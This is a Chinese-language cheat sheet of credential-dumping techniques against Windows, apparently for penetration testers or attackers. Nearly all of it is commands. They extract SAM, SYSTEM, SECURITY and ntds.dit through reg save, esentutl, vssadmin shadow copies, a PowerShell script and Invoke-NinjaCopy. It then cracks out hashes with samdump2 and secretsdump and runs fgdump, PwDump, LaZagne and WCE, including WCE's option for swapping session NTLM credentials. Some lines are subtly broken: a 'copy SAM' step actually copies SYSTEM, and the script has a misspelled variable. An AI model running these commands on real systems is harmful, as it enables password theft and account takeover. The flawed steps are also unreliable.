SAM转储
此文件只为于 C:\windows\system32\config\SAM 和 C:\windows\system32\config\SYSTEM 中,不过该文件受到保护,不能使用常规复制导出它们。
注册表窃取
从注册表转储,使用以下命令即可:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
将生成的文件移动到Kali Linux并运行以下命令即可提取HASH:
┌──(root㉿kali)-[~]
└─# samdump2 ghost.system ghost.sam
也可以使用 impacket-secretsdump 工具提取:
┌──(root㉿kali)-[~]
└─# impacket-secretsdump -sam ghost.sam -security ghost.security -system ghost.system LOCAL
esentutl.exe
攻击者可以使用 Windows 自带的 esentutl.exe 程序转储 SAM/Security:
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d C:\Users\Administrator\Desktop\esentutl.sam
卷影复制
通过使用vssadmin工具将受保护的文件复制到自定义目录(需要管理员权限):
vssadmin create shadow /for=C:
# 复制 SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SAM
# 复制 SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
# 复制 ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
# 创建卷影副本的符号链接并访问
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\使用PowerShell脚本将SAM文件复制到C:\Users\Public\目录下:
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
$voume.Delete();if($notrunning -eq 1){$service.Stop()}Invoke-NinjaCopy
攻击者可以通过使用 PowerSploit 工具中的 Invoke-NinjaCopy 脚本来复制 SAM、SYSTEM、ntds.dit:
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "C:\Users\Administrator\Desktop\SAM"工具
fgdump.exe:该工具位于Kali Linux的/usr/share/windows-binaries/fgdump目录下,将其移动到目标Windows主机,以管理员权限运行该工具,将会在当前目录下生成三个文件,其中*.pwdump是导出的密码HASH:
PwDump:该工具位于Kali Linux的/usr/share/windows-binaries/fgdump目录下,将其移动到目标Windows主机,运行以下命令将会提取SAM:
.\PwDump.exe -o pwd -x 127.0.0.1
LaZagne:LaZagne项目是一个开源应用程序,用于检索本地计算机上存储的大量密码。每个软件都使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具的开发目的是为了查找最常用软件的密码。
laZagne.exe allWCE:Windows 凭据编辑器,用于列出登录会话以及添加、更改、列出和删除关联凭据(例如:LM/NT 哈希、纯文本密码和 Kerberos 票证)。该工具默认在Kali Linux的/usr/share/windows-resources/wce目录下,将其移动到Windows主机,运行以下命令即可获取凭据:
# 列出登录的会话和 NTLM 凭据
wce.exe -l
# 修改当前登录会话的 NTLM 凭据
wce.exe -s 用户名:域名:LM哈希:NT哈希
# 生成 LM 和 NT 的哈希
wce.exe -g 密码
# 保存所有的输出到一个文件
wce.exe -o 文件名
pwdump7:pwdump7 和其他pwdump 工具之间的主要区别在于通过从文件系统中提取二进制 SAM 和 SYSTEM 文件来运行,然后提取哈希值。
